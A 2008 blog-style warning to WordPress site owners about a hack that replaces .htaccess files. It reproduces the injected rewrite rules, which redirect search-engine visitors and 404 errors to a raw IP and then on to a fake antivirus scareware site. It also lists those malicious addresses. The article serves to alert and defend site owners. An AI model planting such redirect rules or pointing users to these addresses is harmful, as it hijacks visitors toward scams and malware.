|
Beware Of Wordpress .htaccess Hack
By Brian Turner
Expert Author
Article Date: 2008-08-28
Just quick heads up for anybody who may have any older Wordpress installs running to check their .htaccess file hasn't been hacked.
I had this happen to a major site a couple of weeks back, and a cursory look at some other sites found it occurring elsewhere.
In short, the original .htaccess file is replaced with one which redirects internal page requests to Russian "check your PC security" site, which may also threaten to install malware.
It's a nasty little hack, and this is what I found on mine:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err The result was to send people to the following link:
http://scan.power-antivirus-2009.com/?aff=1050
Ugly, nasty, and very annoying.
Go check now if you need to.
Comments
About the Author:
I'm a SEO & business consultant in the UK, specialising in SME's and start-ups.
I run Platinax Internet as a free resource for small business trying to get the best out of being online and offer internet management services from my main company, Britecorp.
In my spare time I'm an aspiring science fiction and fantasy writer, and currently live with my family in the Highlands of Scotland.
Contact Brian
|
|
